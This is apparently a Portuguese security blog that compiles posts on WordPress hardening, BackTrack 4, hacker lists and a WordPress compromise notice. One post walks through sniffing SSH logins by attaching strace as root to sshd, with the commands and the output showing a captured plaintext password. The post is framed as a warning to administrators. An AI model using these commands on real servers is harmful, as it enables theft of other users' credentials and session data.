… BlogMind … Where open minds meet …

Transcrevo aqui excelentes dicas de segurança para tornar seu Blog mais resistente as ameaças da internet, pois nem só de bons visitantes e bons comentários vive o seu Blog.

Pode ter certeza que constantemente Crackers e todo o tipo de malfeitores da Web tentam encontrar alguma vulnerabilidade, seja no seu servidor Web ou no WordPress. Como na maioria das vezes a segurança do Servidor não está na mão do Blogueiro, pelo menos, a segurança do WordPress pode ser melhorada através de alguns plugins e pequenas modificações na estrutura do Blog!!

Estas dicas foram postadas originalmente no Dicas-L!

O WordPress é atualmente a maior referência em gerenciadores de conteúdo livres. A facilidade de uso permite a criação de um blog em minutos.

Como 99% dos blogueiros estão mais preocupados em disponibilizar conteúdo e monitorar as estatísticas do seu blog, eles acabam esquecendo que existem visitantes sedentos para encontrar vulnerabilidades que permitem ataques como SQL Injection, Session Hijacking, dentre outros.

Para ajudar blogueiros experientes e inexperientes faço aqui uma coletânea de ações e ferramentas que ajudarão nesta tarefa ardua que é manter seu blog disponível, integro e confiável.

1. Mantenha o WordPress e os Plugins atualizados – Plugin WordPress Automatic Upgrade.
2. Faça backups diários – Plugin WP-DBManager.
3. Altere sua senha constantemente e faça uso de senhas fortes
4. Renomeie o usuário admin – Plugin Admin Renamer Extended.
5. Elimine plugins desnecessários
6. Conecte usando SFTP ou SSH ao invés do FTP
7. Renomeie as tabelas do WordPress DB – Plugin WP Security Scan.
8. Oculte o contéudo do diretório Plugins – Faça isso criando um arquivo index.html em branco neste diretório
9. Evite que ferramentas de buscas indexem os diretórios do WP – Faça isso criando um arquivo robots.txt adicionando a linha “Disallow: /wp-*” dentro deste arquivo.
10. Protega a página de login do WP – Plugins Login Lockdown e Chap Secure Login.
11. Bloqueie a navegação nos diretórios – Edite o arquivo .htaccess adicionando a linha “Options All -Indexes”
12. Oculte a versão do WP – Plugin Secure WordPress.
13. Faça um scanning de vulnerabilidades no WP – Plugin WP-Scanner.

OBS: Muito cuidado na utilização de alguns plugins. A instalação de muitos plugins podem degradar o desempenho do seu blog.

As dicas apresentadas são bastante simples e bem fáceis de implementar, algumas necessitam de acesso SSH porem alguns webhosts não permitem este tipo de acesso.

Seguem alguns interessantes links que serviram de “inspiração” e que possuem informações importantes e mais completas do que este simples e singelo post.

• 20+ Ways to Harden and Secure Your WordPress Blog
• Hardening WordPress.
• 20 WordPress Security Plug-ins And Tips To keep Hackers Away
• WordPress Security FAQ
• WordPress Security Links

Blog do autor: http://blog.alexos.com.br/

Após um longo tempo de desenvolvimento saiu a última versão final do Backtrack.

Para quem ainda não conhece trata-se de uma Distribuição Linux voltada para profissionais de Segurança da Informação e interessados na área, pois contempla centenas de ferramentas para Testes de Penetração, Análise de vulnerabilidades, gestão de riscos e até mesmo para suporte em Auditorias como a da ISO 27000, SOX ou Basileia.

Abaixo o texto traduzido do Blog do Projeto:

BackTrack 4 está no ar e junto com este release vem algumas boas notícias, atualizações e desenvolvimentos. BackTrack 4 uma longa estrada até aqui, com o release abeta no ano passado, nós decidimos esperar para liberar o BackTrack 4 Final antes que ele estivesse perfeito em todos os sentidos e formas.

Este release inclui um novo kernel, um repositório de ferramentas maior, ferramentas customizadas que você pode encontrar somente no BackTrack mais importantes correções de bugs e outras otimizações. Com este release nós recebemos muito suporte e ajuda de toda a comunidade e somo gratos a todos que contribuíram para o sucesso do BackTrack 4.

Nós mudamos o BackTrack para uma “casa” dedicada a ele, onde podemos mante-lo atualizado com as últimas notícias sobre seu desenvolvimento. O nosso objetivo é finalmente produzir uma distribuição Linux focada na segurança, uma distro cada vez melhor.

Nós esperamos que você concorde que este é o melhor BackTrack de todos até hoje. Você pode baixar o BackTrack 4 aqui.

No Curso de Segurança da Informação da Unisinos um dos trabalhos interessantes deste semestre foi construir uma HACK através com uma lata de batatas pringles. Ok … eu sei que isto não é novo, mas não deixa de ser interessante …

E o Huff, colocou no seu Blog, um passo-a-passo, com direito a shoplist e mutas fotos de como montar uma …

Os testes, eu presenciei, foram fantástico, pois um sinal que não era a recebido a 50m, passou a ser capatado a mais de 200 metros, isto passando por paredes de gesso e madeira … wow!!

No campus da universidade foram captados sinais a mais de 1km de distância, em linha reta e sem obtáculos … nada mal para uma gabiarra!!

;-0

Escrevi, parceria com dois colegas, este artigo e disponibilizo aqui no Blog para Download.

Download do arquivo em pdf no Disco Virtual na seção de Artigos!!

Abaixo o Abstract:

Session hijacking em ambientes de storage

Leandro Godoy¹, Paulo Campos¹, Ulysses Costa¹.

¹Curso de Segurança da Informação – Universidade do Vale dos Sinos (Unisinos)
São Leopoldo – RS – Brazil

leandro@opencode.com.br,{colorado.poa,ulycosta}@gmail.com

Abstract. This article intends to present the various ways the technical use of session hijacking in protocols that are most used in the storage area networks actually. Theories will be developed, based on reported vulnerabilities of the protocols defined in scope.

Resumo. Este artigo tem a intenção de apresentar as diversas maneiras do emprego da técnica de session hijacking em protocolos utilizados nas storage area networks atualmente. Serão tecidas teorias, baseadas nas vulnerabilidades reportadas nos protocolos definidos no escopo.

Aguardei ansioso o lançamento do Darwinports e do Fink para o Leopard (Mac OS 10.5) e finalmente neste final de semana pude instalar … 

E finamente pude instalar o nmap e screen no terminal do meu Mac.

Desde que troquei o Tiger e migrei para o Leopard isto foi o que mais me fez falta … agora meu Mac está completo. Até Unreal Tournament eu instalei … mas haaaa!!

Para quem não sabe do que estou falando, pode dar uma pesquisada aqui no Blog pois já escrevi sobre todos os programas citados acima, mas basicamente o que o Darwinports faz é portar para o Mac o Ports do BSD, a poderosa ferramenta que permite gerenciar os Pacotes via linha de comando .

Além de ter uma ótima ferramenta para Gerenciar seus pacotes este programa te abre a possibilidade de instalar a infinidade de pacotes dos BSDs no Mac com um simples port intall.

As possibilidades são imensas com isto .. limita-se a sua imaginação.

Quanto ao Fink … bem para que é amante do Debian como eu, poder utilizar o poderoso APT e DPKG no Mac é juntar a fome e a gula.

O Fink é um projeto OpenSource que recompila os pacotes para rodarem em plataforma PowerPC e agora Intel, colocando-os em um repositório e disponibilizando o apt para baixá-los e instalá-los.

E para a cereja do bolo instala o Dpkg para que tu possas gerenciar os pacotes à maneira Debian.

Bem não é preciso dizer que isto facilita muito a vida.

Imagine ter a melhor interface gráfica, uma infinidade de pacotes a disposição e as melhores ferramentas para gerenciá-los …

Isto é o resultado do Leopard + Ports + Fink

O sonho de todo hacker … não é a toa que a maioria usa Mac.

Dizem que até o Bill Gates comprou um agora que saiu da Microsoft

Mods para iPhone

Link para um Blog com excelentes dicas com Hacks para o iPhone em Português.
O legal e irônico é que o blog está hospedado no serviço .mac da própria Apple!!
É claro que é uma conta de usuário e a Apple nem deve saber disto …

Quando tiver um, com certeza vou fazer alguns hacks indicados neste blog …

Outros Links:
Hackintosh Unlock

Hackintosh Geral

Wiki dos Desenvolvedores

O Blog de Geohot

Saiu no ITSecurity uma lista dos 10 mais famosos Hackers e Crackers da História.
O site dividiu em duas Categorias:

Black Hat Crackers

1. jonathan James
2. Adrian Lamo
3. Kevin Mitinick
4. Kevin Poulsen
5. Robert Tappan Morris

White Hat Hackers

1. Stephen Wozniak
2. Tim Berners-Lee
3. Linux Torvalds
4. Richard Stallman
5. Tsutomu Shimomura

Alguns pontos que achei interessante das escolhas foram o Woz como primeiro Hacker (para quem não sabe ele é um dos fundadores da Apple ao lado do outro Steve … Jobs). O autor deve ser entusiasta da Apple.
E deve gostar de filmes de hackers por ter escolhido o Mitinik e o Shimomura, protagonistas de uma das mais famosas histórias de “gato e rato” da Cultura Hacker.

A minha lista seria diferente … mas quem sou eu para julgar estes caras??

Outra lista de Top 10 que li recentemente e que me chamou a atenção é a de Ameaças de Segurança …
As ameaças não são novas mas o que me surpeendeu foi o reconhecimento de que a maior delas é a Engenharia Social (e talvez o Kevin Mitinick era um grande gênio) …
De nada adiante termos as melhores ferramentas de segurança se ao ligar para a Secretária ela fornecer seu login e senha para acesso ao computador e/ou o helpdesk fornecer dados críticos da rede a alguem ao telefone sem saber com confiança quem é …
Vale a leitura …

Abraços

É possivel Sniffar as Conexões via SSH simplesmente escutando as chamadas System Calls do daemon SSHD.
Existe um ponto de comunicação entre o SSHD e o Kernel, entre a Criptografia e a Descriptografia, em que os dados passam em Texto Plano (plain text) e este tráfego pode ser capturado com o uso do Strace.

Sniffando a Senha do Login:

1) No servidor que está com o Server do SSH rodando descubra qual o pid do daemon sshd:

Zion:~# ps aux | grep sshd | grep -v grep
root      6097  0.0  0.1   4792  1076 ?        Ss   16:49   0:00 /usr/sbin/sshd

2) De posse deste pid dispare o Strace (como root):

Zion:~# strace -f -p 6097 -o snif_ssh.txt &

Este comando irá logar no arquivo sniff_ssh.txt todas as chamadas  do processo de pid 6097 (sshd).
Uma lida no man do strace ajuda a entender e experimentar outras opções de filtragem e paãmetros.

3) De um outro servidor, ou para fins de teste da mesma máquina, faça um ssh com um usuário qualquer:

godoy@Zion:~$ ssh localhost
Password: textoplano
Last login: Mon May  7 17:01:15 2007 from localhost.localdomain
godoy@Zion:~$

4) Agora analíse as saídas que foram logadas no arquivo sniff_ssh.txt, procure pelas chamadas read ou write:

Zion:~# cat snif_ssh.txt | grep read | more
6521  write(4, “\0\0\0\1\0\0\0\ntextoplano”, 18 <unfinished …>
6520  <… read resumed> “7\0\0\0\1\0\0\0\ntextoplano”, 19) = 19
6520  write(7, “\0\0\0\ntextoplano”, 14 <unfinished …>
6522  <… read resumed> “\6\0\0\0\ntextoplano”, 15) = 15

Sniffando as demais transferências de dados:

1) Digite o seguinte comando, restringindo a busca as chamadas read e write:

Zion:~# strace -f -p 6097 -o snif_ssh.txt -v -e trace=read,write -s 128 &

2) Teste alguns comandos no cliente:

godoy@Zion:~$ cat > teste.txt
======== OK =======
Sniffou??
======= OK =======
godoy@Zion:~$

3) Verifique o log o servidor pesquisando por write ou read:

Zion:~# cat snif_ssh.txt | grep  ===
6586  <… read resumed> “======== OK =======\n”, 4096) = 20
6586  write(1, “======== OK =======\n”, 20) = 20
6586  <… read resumed> “======= OK =======\n”, 4096) = 19
6586  write(1, “======= OK =======\n”, 19) = 19
Zion:~# cat snif_ssh.txt | grep  Sniff
6586  <… read resumed> “Sniffou??\n”, 4096) = 10
6586  write(1, “Sniffou??\n”, 10)       = 10
Zion:~#

Como a saída do Strace é muito prolixa e pode rapidamente criar um arquivo bem grande, cabe aqui um script  para filtrar melhor o log que será gravado no arquivo sniff_ssh.txt.
Pode-se imaginar que é perfeitamente possível disparar tais comandos no lado do cliente!!
E que também pode-se criar um rootkit que se aproveite desta comunicação de SystemCalls para pegar o tráfego entre o Servidor SSH e seus clientes.
Portanto tome muito cuidado com os seus servidores SSH e coms seus clientes.

Este texto tem o objetivo de ser bem didático e não técnico. Veja o texto completo que originou este aqui.

” … eu … um pouco decepcionado com o SSH …”

Atualizei ontem o Blog para a versão 2.1.2 do WordPress, pois segundo o site o código da versão anterior pode conter um Exploit.

Explicando: Segundo a notificação do WP no seu site, um dos Servidores que hospeda o projeto foi comprometido e um exploit foi adicionado ao conteúdo original do programa.

Eles acreditam que isto ocorreu a uns 3 ou 4 dias, todavia como o servidor está off-line sendo analisado (Forense) pode ser que tenha ocorrido a mais tempo, portanto, o upgrade é obrigatório para todos que tinham a versão anterior.

Notem a seguinte diferença: A falha não está no código do WP que foi mal escrito e sim no servidor que foi invadido e um código malicioso foi anexado ao original, provavelmente para abrir um backdoor ou possibilitar um SQLInjection em Blogs que não forem atualizados.

A Atualização não trás novas features ou melhorias, apenas corrige o bug.

Abraços